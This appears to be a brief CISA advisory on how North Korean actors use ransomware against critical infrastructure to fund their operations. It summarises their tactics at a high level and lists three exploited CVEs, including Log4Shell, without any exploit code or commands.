Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities | CISA

February 12, 2023

North Korea (DPRK) employs ransomware attacks on critical infrastructure to fund its malicious cyber activities. The tactics, techniques, and procedures (TTPs) observed in these attacks include traditional ransomware methods and unique strategies aimed at concealing DPRK involvement. Below are the key TTPs used in these operations:

Acquire Infrastructure [T1583]

DPRK actors acquire infrastructure by generating domains, personas, and accounts, and identifying cryptocurrency services to support their ransomware operations. Infrastructure, IP addresses, and domains are often procured using cryptocurrency obtained through illicit activities such as ransomware attacks and cryptocurrency theft.

Obfuscate Identity

To hide their involvement, DPRK actors operate under third-party foreign affiliate identities and use intermediaries to receive ransom payments. These tactics ensure their activities appear to originate from foreign entities, concealing their DPRK affiliation.

Use VPNs and VPSs [T1583.003]

DPRK cyber actors frequently utilize virtual private networks (VPNs) and virtual private servers (VPSs), along with third-country IP addresses, to appear as if they are operating from innocuous locations rather than North Korea.

Gain Access to Networks [TA0001]

To infiltrate networks, DPRK actors exploit common vulnerabilities and exposures (CVEs). Once inside, they escalate privileges and carry out further attacks. Recent CVEs exploited by these actors include:

  • CVE-2021-44228: Remote code execution in the Apache Log4j software library (Log4Shell).
  • CVE-2021-20038: Vulnerability in SonicWall SMA 100 appliances.
  • CVE-2022-24990: Exploited to gain unauthorized access.
Subscribe